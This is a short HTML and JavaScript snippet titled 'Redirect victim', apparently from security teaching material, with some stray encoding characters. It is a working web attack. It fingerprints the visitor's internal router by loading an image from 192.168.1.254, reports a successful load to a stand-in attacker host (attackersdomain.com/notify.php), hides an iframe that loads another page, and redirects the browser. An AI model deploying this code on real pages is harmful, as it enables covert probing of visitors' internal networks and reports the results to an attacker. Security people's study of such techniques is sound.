çRedirect
victim to Youtube video:
ç<html><!-- index.html
--><head><script>
¼function redirect() {
¼targetURL="http://www.google.com/search?ie=UTF-8&oe=UTF8
&sourceid=navclient&gfns=1&q=techno+viking";
¼notifyURL="http://www.attackersdomain.com/notify.php";
¼imgsrc = 'http://192.168.1.254/images/head_wave.gif';
¼fingerprint_img = new Image();
¼fingerprint_img.onerror = function (evt) {; //alert(this.src +
" can't be loaded.");
}
¼fingerprint_img.onload = function (evt) {C=new Image();
C.src=notifyURL;}
¼fingerprint_img.src = imgsrc;
¼setTimeout("document.location=targetURL", 500);
¼}</script></head><body><iframe
onload="redirect()" frameborder=0 height=0 width=0
src="./ras.html"></iframe></body></html>